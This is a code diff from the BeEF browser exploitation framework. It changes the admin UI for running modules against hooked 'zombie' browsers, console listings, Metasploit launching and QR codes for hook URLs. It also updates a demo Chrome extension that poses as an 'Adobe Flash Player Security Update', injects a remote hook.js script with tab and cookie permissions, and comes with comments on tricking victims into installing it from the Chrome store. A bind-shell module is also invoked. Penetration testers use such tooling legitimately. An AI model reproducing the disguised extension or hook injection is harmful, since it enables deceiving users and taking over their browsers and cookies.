maxSize: 500
});
var list_panel = new Ext.Panel({
id: "zombie-autorun-list"+zombie.session,
title: "Selected Modules",
region:'west',
border: true,
width: 190,
minSize: 190,
maxSize: 500
});
var command_module_tree = new Ext.tree.TreePanel({
id: "zombie-autorun-modules"+zombie.session,
title: "Module Tree",
border: true,
region: 'west',
width: 190,
minSize: 190,
maxSize: 500, // if some command module names are even longer, adjust this value
useArrows: true,
autoScroll: true,
animate: true,
containerScroll: true,
rootVisible: false,
root: {nodeType: 'async'},
buttons:[new Ext.Button({
text:'Execute',
hidden:false,
handler:function(){
var tree = Ext.getCmp('zombie-autorun-modules'+zombie.session);
var sel_nodes = tree.getChecked();
if(sel_nodes.length > 0){
sel_nodes.forEach(function(item){
if(item.hasChildNodes())
sel_nodes.remove(item)
});
var mods_to_send = {
'hb':zombie.session,
'modules':[]
};
Ext.each(sel_nodes,function(item){
var id = item.id;
var module = get_module_details(id,token);
module = process_module_opts(module);
mods_to_send['modules'].push(module);
});
send_modules(token,mods_to_send);
}else {
//TODO: handle this case
}
}})],
loader: new Ext.tree.TreeLoader({
dataUrl: '/ui/modules/select/commandmodules/tree.json',
baseParams: {zombie_session: zombie.session},
createNode: function(attr) {
if(attr.checked == null){attr.checked = false;}
return Ext.tree.TreeLoader.prototype.createNode.call(this, attr);
},
listeners:{
beforeload: function(treeloader, node, callback) {
// Show loading mask on body, to prevent the user interacting with the UI
treeloader.treeLoadingMask = new Ext.LoadMask(Ext.getBody(),{msg:"Please wait, command tree is loading..."});
treeloader.treeLoadingMask.show();
return true;
},
load: function(treeloader, node, response) {
// Hide loading mask after tree is fully loaded
treeloader.treeLoadingMask.hide();
//if(node.parentNode.isChecked())
node.getUI().toggleCheck();
return true;
}
}
}),
listeners: {
'click': function(node) {
if(!node.hasChildNodes()){
details_panel.removeAll();
details_panel.doLayout();
// needs to be a functions (get_module_opts)
var id = node.id;
var module = get_module_details(id,token);
if(!module){
Ext.beef.msg("Module is null");
}
var inputs = module['options'];
Ext.each(inputs,function(item){
generate_form_input_field(details_panel,item,item['value'],false,zombie);
});
details_panel.doLayout();
}
},
'afterrender' : function() {},
'selectionchange' : function() {},
'activate' : function() {},
'select' : function() {},
'keyup' : function() {},
'render' : function(c) { c.getEl().on('keyup', function() {});},
'checkchange':function(node,check){
if(check){
// expand and select all nodes under a parent
if(node.isExpandable())
node.expand();
node.cascade(function(n){
if(!n.getUI().isChecked())
n.getUI().toggleCheck();
});
}
// Collapse and deselect all children under the parent
else{
node.cascade(function(n){
if(n.getUI().isChecked())
n.getUI().toggleCheck();
});
node.collapse();
}
}
}
});
ZombieTab_Autorun.superclass.constructor.call(this, {
id: 'zombie-'+zombie.session+'-autorun-panel',
title:'Autorun',
layout: 'hbox',
hidden: true,
layoutConfig:{align:'stretch'},
region: 'center',
selModel:Ext.tree.MultiSelectionModel,
items:[command_module_tree,details_panel]
});
};
Ext.extend(ZombieTab_Autorun, Ext.Panel, {
listeners: {close: function(panel) {}}
});

25
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
View File

@@ -19,27 +19,6 @@ ZombieTab_IpecTab = function(zombie) {
autoscroll: true
});
function get_rest_token(){
var token = "";
var url = "/ui/modules/getRestfulApiToken.json";
$jwterm.ajax({
contentType: 'application/json',
dataType: 'json',
type: 'GET',
url: url,
async: false,
processData: false,
success: function(data){
token = data.token;
console.log(token);
},
error: function(){
console.log("Error getting RESTful API token");
}
});
return token;
}
function get_module_id(name, token){
var id = "";
var url = "/api/modules/search/" + name + "?token=" + token;
@@ -115,7 +94,7 @@ ZombieTab_IpecTab = function(zombie) {
var cmd = tokens.join(' '); //needed in case of commands with options
cmd = cmd.replace(/\\/g, '\\\\'); //needed to prevent JS errors (\ need to be escaped)
var token = get_rest_token();
var token = beefwui.get_rest_token();
var mod_id = get_module_id("BeEF_bind_shell", token);
var uri = "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token;
@@ -148,7 +127,7 @@ ZombieTab_IpecTab = function(zombie) {
if(command_id != null){
var token = get_rest_token();
var token = beefwui.get_rest_token();
var mod_id = get_module_id("BeEF_bind_shell", token);
var uri_results = "/api/modules/" + zombie.session + "/" + mod_id + "/"

2
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
View File

@@ -32,7 +32,7 @@ ZombieTab_Requester = function(zombie) {
title: 'Proxy',
layout: 'fit',
padding: '10 10 10 10',
html: "<p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p>",
html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
listeners: {
activate: function(proxy_panel) {
// to do: refresh list of hooked browsers

5
extensions/console/lib/command_dispatcher/core.rb
View File

@@ -142,11 +142,12 @@ class Core
'Id',
'IP',
'Browser',
'OS'
'OS',
'Hardware'
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
end
puts "\n"

526
extensions/console/lib/shellinterface.rb
View File

@@ -8,14 +8,14 @@ module Extension
module Console
class ShellInterface
BD = BeEF::Core::Models::BrowserDetails
def initialize(config)
self.config = config
self.cmd = {}
end
def settarget(id)
begin
self.targetsession = BeEF::Core::Models::HookedBrowser.first(:id => id).session
@@ -25,7 +25,7 @@ class ShellInterface
return nil
end
end
def setofflinetarget(id)
begin
self.targetsession = BeEF::Core::Models::HookedBrowser.first(:id => id).session
@@ -35,7 +35,7 @@ class ShellInterface
return nil
end
end
def cleartarget
self.targetsession = nil
self.targetip = nil
@@ -43,11 +43,11 @@ class ShellInterface
self.cmd = {}
end
# This is a *modified* replica of select_command_modules_tree from extensions/admin_ui/controllers/modules/modules.rb
# @note Get commands. This is a *modified* replica of select_command_modules_tree from extensions/admin_ui/controllers/modules/modules.rb
def getcommands
return if self.targetid.nil?
tree = []
BeEF::Modules.get_categories.each { |c|
if c[-1,1] != "/"
@@ -104,39 +104,39 @@ class ShellInterface
update_command_module_tree(tree, dyn_mod_category, "Verified Unknown", command_mod_name,dyn_mod.id)
}
end
# sort the parent array nodes
# sort the parent array nodes
tree.sort! {|a,b| a['text'] <=> b['text']}
# sort the children nodes by status
tree.each {|x| x['children'] =
x['children'].sort_by {|a| a['status']}
}
# append the number of command modules so the branch name results in: "<category name> (num)"
#tree.each {|command_module_branch|
# num_of_command_modules = command_module_branch['children'].length
# command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
#}
# return a JSON array of hashes
tree
end
def setcommand(id)
key = BeEF::Module.get_key_by_database_id(id.to_i)
self.cmd['id'] = id
self.cmd['Name'] = self.config.get("beef.module.#{key}.name")
self.cmd['Description'] = self.config.get("beef.module.#{key}.description")
self.cmd['Category'] = self.config.get("beef.module.#{key}.category")
self.cmd['Data'] = BeEF::Module.get_options(key)
end
def clearcommand
self.cmd = {}
end
def setparam(param,value)
self.cmd['Data'].each do |data|
if data['name'] == param
@@ -145,12 +145,12 @@ class ShellInterface
end
end
end
def getcommandresponses(cmdid = self.cmd['id'])
commands = []
i = 0
BeEF::Core::Models::Command.all(:command_module_id => cmdid, :hooked_browser_id => self.targetid).each do |command|
commands.push({
'id' => i,
@@ -160,10 +160,10 @@ class ShellInterface
})
i+=1
end
commands
end
def getindividualresponse(cmdid)
results = []
begin
@@ -175,26 +175,26 @@ class ShellInterface
end
results
end
def executecommand
definition = {}
options = {}
options.store("zombie_session", self.targetsession.to_s)
options.store("command_module_id", self.cmd['id'])
if not self.cmd['Data'].nil?
self.cmd['Data'].each do |key|
options.store("txt_"+key['name'].to_s,key['value'])
end
end
options.keys.each {|param|
options.keys.each {|param|
definition[param[4..-1]] = options[param]
oc = BeEF::Core::Models::OptionCache.first_or_create(:name => param[4..-1])
oc.value = options[param]
oc.save
}
mod_key = BeEF::Module.get_key_by_database_id(self.cmd['id'])
# Hack to rework the old option system into the new option system
def2 = []
@@ -207,7 +207,7 @@ class ShellInterface
else
return false
end
#Old method
#begin
# BeEF::Core::Models::Command.new( :data => definition.to_json,
@@ -218,10 +218,10 @@ class ShellInterface
#rescue
# return false
#end
#return true
end
def update_command_module_tree(tree, cmd_category, cmd_status, cmd_name, cmd_id)
# construct leaf node for the command module tree
@@ -240,7 +240,7 @@ class ShellInterface
end
}
end
def get_command_module_status(mod)
hook_session_id = self.targetsession
if hook_session_id == nil
@@ -250,7 +250,7 @@ class ShellInterface
'browser' => BD.get(hook_session_id, 'BrowserName'),
'ver' => BD.get(hook_session_id, 'BrowserVersion'),
'os' => [BD.get(hook_session_id, 'OsName')]})
when BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
return "Verified Not Working"
when BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY
@@ -263,400 +263,108 @@ class ShellInterface
return "Verified Unknown"
end
end
#Yoinked from the UI panel - we really need to centralise all this stuff and encapsulate it away??
# @note Returns a JSON array containing the summary for a selected zombie.
# Yoinked from the UI panel -
# we really need to centralise all this stuff and encapsulate it away.
def select_zombie_summary
return if self.targetsession.nil?
# init the summary grid
summary_grid_hash = {
'success' => 'true',
'success' => 'true',
'results' => []
}
# set and add the return values for the page title
page_title = BD.get(self.targetsession, 'PageTitle')
if not page_title.nil?
encoded_page_title = CGI.escapeHTML(page_title)
encoded_page_title_hash = { 'Page Title' => encoded_page_title }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_title_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
# zombie properties
# in the form of: category, UI label, value
zombie_properties = [
# Browser
['Browser', 'Browser Name', 'BrowserName'],
['Browser', 'Browser Version', 'BrowserVersion'],
['Browser', 'Browser UA String', 'BrowserReportedName'],
['Browser', 'Browser Platform', 'BrowserPlatform'],
['Browser', 'Browser Plugins', 'BrowserPlugins'],
['Browser', 'Window Size', 'WindowSize'],
# Browser Components
['Browser Components', 'Flash', 'HasFlash'],
['Browser Components', 'Java', 'JavaEnabled'],
['Browser Components', 'VBScript', 'VBScriptEnabled'],
['Browser Components', 'PhoneGap', 'HasPhonegap'],
['Browser Components', 'Google Gears', 'HasGoogleGears'],
['Browser Components', 'Silverlight', 'HasSilverlight'],
['Browser Components', 'Web Sockets', 'HasWebSocket'],
['Browser Components', 'QuickTime', 'HasQuickTime'],
['Browser Components', 'RealPlayer', 'HasRealPlayer'],
['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
# Hooked Page
['Hooked Page', 'Page Title', 'PageTitle'],
['Hooked Page', 'Page URI', 'PageURI'],
['Hooked Page', 'Page Referrer', 'PageReferrer'],
['Hooked Page', 'Host Name/IP', 'HostName'],
['Hooked Page', 'Cookies', 'Cookies'],
# Host
['Host', 'Date', 'DateStamp'],
['Host', 'Operating System', 'OsName'],
['Host', 'Hardware', 'Hardware'],
['Host', 'CPU', 'CPU'],
['Host', 'Screen Size', 'ScreenSize'],
['Host', 'Touch Screen', 'TouchEnabled']
]
# set and add the return values for each browser property
# in the form of: category, UI label, value
zombie_properties.each do |p|
case p[2]
when "BrowserName"
data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
when "ScreenSize"
screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
height = screen_size_hash['height']
cdepth = screen_size_hash['colordepth']
data = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
when "WindowSize"
window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width']
height = window_size_hash['height']
data = "Width: #{width}, Height: #{height}"
else
data = BD.get(zombie_session, p[2])
end
# add property to summary hash
if not data.nil?
summary_grid_hash['results'].push({
'category' => p[0],
'data' => { p[1] => CGI.escapeHTML("#{data}") },
'from' => 'Initialization'
})
end
end
# set and add the return values for the page uri
page_uri = BD.get(self.targetsession, 'PageURI')
if not page_uri.nil?
encoded_page_uri = CGI.escapeHTML(page_uri)
encoded_page_uri_hash = { 'Page URI' => encoded_page_uri }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_uri_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the page referrer
page_referrer = BD.get(self.targetsession, 'PageReferrer')
if not page_referrer.nil?
encoded_page_referrer = CGI.escapeHTML(page_referrer)
encoded_page_referrer_hash = { 'Page Referrer' => encoded_page_referrer }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_referrer_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the host name
host_name = BD.get(self.targetsession, 'HostName')
if not host_name.nil?
encoded_host_name = CGI.escapeHTML(host_name)
encoded_host_name_hash = { 'Hostname/IP' => encoded_host_name }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_host_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the date
date_stamp = BD.get(self.targetsession, 'DateStamp')
if not date_stamp.nil?
encoded_date_stamp = CGI.escapeHTML(date_stamp)
encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
page_name_row = {
'category' => 'Host',
'data' => encoded_date_stamp_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
os_name = BD.get(self.targetsession, 'OsName')
if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_os_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
hw_name = BD.get(self.targetsession, 'Hardware')
if not hw_name.nil?
encoded_hw_name = CGI.escapeHTML(hw_name)
encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_hw_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(self.targetsession, 'BrowserName')
if not browser_name.nil?
friendly_browser_name = BeEF::Core::Constants::Browsers.friendly_name(browser_name)
browser_name_hash = { 'Browser Name' => friendly_browser_name }
browser_name_row = {
'category' => 'Browser',
'data' => browser_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_name_row) # add the row
end
# set and add the return values for the browser version
browser_version = BD.get(self.targetsession, 'BrowserVersion')
if not browser_version.nil?
encoded_browser_version = CGI.escapeHTML(browser_version)
browser_version_hash = { 'Browser Version' => encoded_browser_version }
browser_version_row = {
'category' => 'Browser',
'data' => browser_version_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_version_row) # add the row
end
# set and add the return values for the browser ua string
browser_uastring = BD.get(self.targetsession, 'BrowserReportedName')
if not browser_uastring.nil?
browser_uastring_hash = { 'Browser UA String' => browser_uastring }
browser_uastring_row = {
'category' => 'Browser',
'data' => browser_uastring_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_uastring_row) # add the row
end
# set and add the list of cookies
cookies = BD.get(self.targetsession, 'Cookies')
if not cookies.nil? and not cookies.empty?
encoded_cookies = CGI.escapeHTML(cookies)
encoded_cookies_hash = { 'Cookies' => encoded_cookies }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the list of plugins installed in the browser
browser_plugins = BD.get(self.targetsession, 'BrowserPlugins')
if not browser_plugins.nil? and not browser_plugins.empty?
encoded_browser_plugins = CGI.escapeHTML(browser_plugins)
encoded_browser_plugins_hash = { 'Browser Plugins' => encoded_browser_plugins }
page_name_row = {
'category' => 'Browser',
'data' => encoded_browser_plugins_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(self.targetsession, 'SystemPlatform')
if not system_platform.nil?
encoded_system_platform = CGI.escapeHTML(system_platform)
encoded_system_platform_hash = { 'System Platform' => encoded_system_platform }
page_name_row = {
'category' => 'Host',
'data' => encoded_system_platform_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie screen size and color depth
screen_size = BD.get(self.targetsession, 'ScreenSize')
if not screen_size.nil?
screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
height = screen_size_hash['height']
colordepth = screen_size_hash['colordepth']
# construct the string to be displayed in the details tab
encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
page_name_row = {
'category' => 'Host',
'data' => encoded_screen_size_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie browser window size
window_size = BD.get(self.targetsession, 'WindowSize')
if not window_size.nil?
window_size_hash = JSON.parse(window_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width']
height = window_size_hash['height']
# construct the string to be displayed in the details tab
encoded_window_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s)
encoded_window_size_hash = { 'Window Size' => encoded_window_size }
page_name_row = {
'category' => 'Browser',
'data' => encoded_window_size_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for JavaEnabled
java_enabled = BD.get(self.targetsession, 'JavaEnabled')
if not java_enabled.nil?
encoded_java_enabled = CGI.escapeHTML(java_enabled)
encoded_java_enabled_hash = { 'Java Enabled' => encoded_java_enabled }
page_name_row = {
'category' => 'Browser',
'data' => encoded_java_enabled_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for VBScriptEnabled
vbscript_enabled = BD.get(self.targetsession, 'VBScriptEnabled')
if not vbscript_enabled.nil?
encoded_vbscript_enabled = CGI.escapeHTML(vbscript_enabled)
encoded_vbscript_enabled_hash = { 'VBScript Enabled' => encoded_vbscript_enabled }
page_name_row = {
'category' => 'Browser',
'data' => encoded_vbscript_enabled_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasFlash
has_flash = BD.get(self.targetsession, 'HasFlash')
if not has_flash.nil?
encoded_has_flash = CGI.escapeHTML(has_flash)
encoded_has_flash_hash = { 'Has Flash' => encoded_has_flash }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_flash_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasPhonegap
has_phonegap = BD.get(self.targetsession, 'HasPhonegap')
if not has_phonegap.nil?
encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_phonegap_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(self.targetsession, 'HasGoogleGears')
if not has_googlegears.nil?
encoded_has_googlegears = CGI.escapeHTML(has_googlegears)
encoded_has_googlegears_hash = { 'Has GoogleGears' => encoded_has_googlegears }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_googlegears_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasWebSocket
has_web_socket = BD.get(self.targetsession, 'HasWebSocket')
if not has_web_socket.nil?
encoded_has_web_socket = CGI.escapeHTML(has_web_socket)
encoded_has_web_socket_hash = { 'Has GoogleGears' => encoded_has_web_socket }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_web_socket_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasActiveX
has_activex = BD.get(self.targetsession, 'HasActiveX')
if not has_activex.nil?
encoded_has_activex = CGI.escapeHTML(has_activex)
encoded_has_activex_hash = { 'Has ActiveX' => encoded_has_activex }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_activex_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for hasSessionCookies
has_session_cookies = BD.get(self.targetsession, 'hasSessionCookies')
if not has_session_cookies.nil?
encoded_has_session_cookies = CGI.escapeHTML(has_session_cookies)
encoded_has_session_cookies_hash = { 'Session Cookies' => encoded_has_session_cookies }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_session_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for hasPersistentCookies
has_persistent_cookies = BD.get(self.targetsession, 'hasPersistentCookies')
if not has_persistent_cookies.nil?
encoded_has_persistent_cookies = CGI.escapeHTML(has_persistent_cookies)
encoded_has_persistent_cookies_hash = { 'Persistent Cookies' => encoded_has_persistent_cookies }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_persistent_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
summary_grid_hash
end
attr_reader :targetsession
attr_reader :targetid
attr_reader :targetip
attr_reader :cmd
protected
attr_writer :targetsession
attr_writer :targetid
attr_writer :targetip

5
extensions/demos/flash_update_chrome_extension/background.js
View File

@@ -6,5 +6,6 @@
d=document;
e=d.createElement('script');
e.src="http://127.0.0.1:3000/hook.js";
d.body.appendChild(e);
e.src="https://192.168.0.2/hook.js";
d.body.appendChild(e);

54
extensions/demos/flash_update_chrome_extension/manifest.json
View File

@@ -1,26 +1,34 @@
{
// Simple chrome extension
// Just loads beef into the extension context.
//
// You may need to set the IP address of the beef hook in background.js
// Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/
// Simple chrome extension, by antisnatchor and Mike Haworth
// Just loads BeEF into the extension context.
//
// 1. You need to set the IP address (better the domain) of the BeEF hook in background.js
// 2. The BeEF hook address must be == to the CSP allowed domain here below. BeEF must listen on port 443, with TLS enabled.
// Only localhost origin is allowed to load scripts from non HTTPS resources. For anything else, you must use HTTPS.
// 4. You need to upload the extension, as a zip file, to Google Chrome store.
// In latest versions of Chrome (>= 21) you can't install an extension from a different location anymore,
// so the extension can't be served by BeEF anymore. You need to trick the victim to install
// the extension from Google Chrome store.
//
"name": "Adobe Flash Player",
"version": "11.2.202.235",
"description": "Introduces vulnerabilites into web browsers",
"background": {
"scripts": ["background.js"]
},
"icons": {
"16": "icon16.png",
"48": "icon48.png",
"128": "icon128.png"
},
"permissions": [
"tabs",
"http://*/*",
"https://*/*",
"file://*/*",
"cookies"
]
"name": "Adobe Flash Player Security Update",
"manifest_version": 2,
"version": "11.5.502.149",
"description": "Updates Adobe Flash Player with latest securty updates",
"background": {
"scripts": ["background.js"]
},
"content_security_policy": "script-src 'self' 'unsafe-eval' https://192.168.0.2; object-src 'self'",
"icons": {
"16": "icon16.png",
"48": "icon48.png",
"128": "icon128.png"
},
"permissions": [
"tabs",
"http://*/*",
"https://*/*",
"file://*/*",
"cookies"
]
}

2
extensions/evasion/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
name: 'Evasion'
authors: ["antisnatchor"]
exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js", "lib/mdetect.js"]
scramble_variables: true
scramble_cookies: true
scramble:

3
extensions/metasploit/config.yaml
View File

@@ -29,9 +29,10 @@ beef:
auto_msfrpcd_timeout: 120
msf_path: [
{os: 'osx', path: '/opt/local/msf/'},
{os: 'livecd', path: '/opt/metasploit-framework/'},
{os: 'bt5r3', path: '/opt/metasploit/msf3/'},
{os: 'bt5', path: '/opt/framework3/msf3/'},
{os: 'backbox', path: '/opt/metasploit3/msf3/'},
{os: 'win', path: 'c:\metasploit\msf3\'},
{os: 'win', path: 'c:\\metasploit-framework\\'},
{os: 'custom', path: ''}
]

51
extensions/metasploit/rpcclient.rb
View File

@@ -36,10 +36,12 @@ module Metasploit
#auto start msfrpcd
if (@config['auto_msfrpcd'] || false)
launch_msf = ''
msf_os = ''
@config['msf_path'].each do |path|
if File.exist?(path['path'] + 'msfrpcd')
launch_msf = path['path'] + 'msfrpcd'
print_info 'Found msfrpcd: ' + launch_msf
msf_os = path['os']
end
end
if (launch_msf.length > 0)
@@ -53,32 +55,35 @@ module Metasploit
end
msf_url += opts[:host] + ':' + opts[:port].to_s() + opts[:uri]
if msf_os.eql? "win"
print_info 'Metasploit auto-launch is currently not supported in BeEF on MS Windows.'
else
child = IO.popen([launch_msf, "-f", argssl, "-P" , @config['pass'], "-U" , @config['user'], "-u" , opts[:uri], "-a" , opts[:host], "-p" , opts[:port].to_s()], 'r+')
child = IO.popen([launch_msf, "-f", argssl, "-P" , @config['pass'], "-U" , @config['user'], "-u" , opts[:uri], "-a" , opts[:host], "-p" , opts[:port].to_s()], 'r+')
print_info 'Attempt to start msfrpcd, this may take a while. PID: ' + child.pid.to_s
print_info 'Attempt to start msfrpcd, this may take a while. PID: ' + child.pid.to_s
#Give daemon time to launch
#poll and giveup after timeout
retries = @config['auto_msfrpcd_timeout']
uri = URI(msf_url)
http = Net::HTTP.new(uri.host, uri.port)
#Give daemon time to launch
#poll and giveup after timeout
retries = @config['auto_msfrpcd_timeout']
uri = URI(msf_url)
http = Net::HTTP.new(uri.host, uri.port)
if opts[:ssl]
http.use_ssl = true
end
if not @config['ssl_verify']
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
headers = {
'Content-Type' => "binary/message-pack"
}
path = uri.path.empty? ? "/" : uri.path
begin
sleep 1
code = http.head(path, headers).code.to_i
rescue Exception
retry if (retries -= 1) > 0
if opts[:ssl]
http.use_ssl = true
end
if not @config['ssl_verify']
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
headers = {
'Content-Type' => "binary/message-pack"
}
path = uri.path.empty? ? "/" : uri.path
begin
sleep 1
code = http.head(path, headers).code.to_i
rescue Exception
retry if (retries -= 1) > 0
end
end
else
print_error 'Please add a custom path for msfrpcd to the config-file.'

39
extensions/qrcode/qrcode.rb
View File

@@ -13,18 +13,43 @@ module Qrcode
def self.pre_http_start(http_hook_server)
require 'uri'
fullurls = []
partialurls = []
configuration = BeEF::Core::Configuration.instance
BeEF::Core::Console::Banners.interfaces.each do |int|
next if int == "localhost" or int == "127.0.0.1"
print_success "QRCode images available for interface: #{int}"
configuration.get("beef.extension.qrcode.target").each do |target|
if target.lines.grep(/^https?:\/\//i).size > 0
fullurls << target
else
partialurls << target
end
end
if fullurls.size > 0
print_success "Custom QRCode images available:"
data = ""
configuration.get("beef.extension.qrcode.target").each do |target|
url = "http://#{int}:#{configuration.get("beef.http.port")}#{target}"
url = URI.escape(url,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
fullurls.each do |target|
url = URI.escape(target,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
data += "https://chart.googleapis.com/chart?cht=qr&chs=#{configuration.get("beef.extension.qrcode.qrsize")}&chl=#{url}\n"
end
print_more data
end
if partialurls.size > 0
BeEF::Core::Console::Banners.interfaces.each do |int|
next if int == "localhost" or int == "127.0.0.1"
print_success "QRCode images available for interface: #{int}"
data = ""
partialurls.each do |target|
url = "http://#{int}:#{configuration.get("beef.http.port")}#{target}"
url = URI.escape(url,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
data += "https://chart.googleapis.com/chart?cht=qr&chs=#{configuration.get("beef.extension.qrcode.qrsize")}&chl=#{url}\n"
end
print_more data
end
end
end

307
liveCD/BeEFLive.sh Normal file
View File

@@ -0,0 +1,307 @@
#!/bin/bash
#
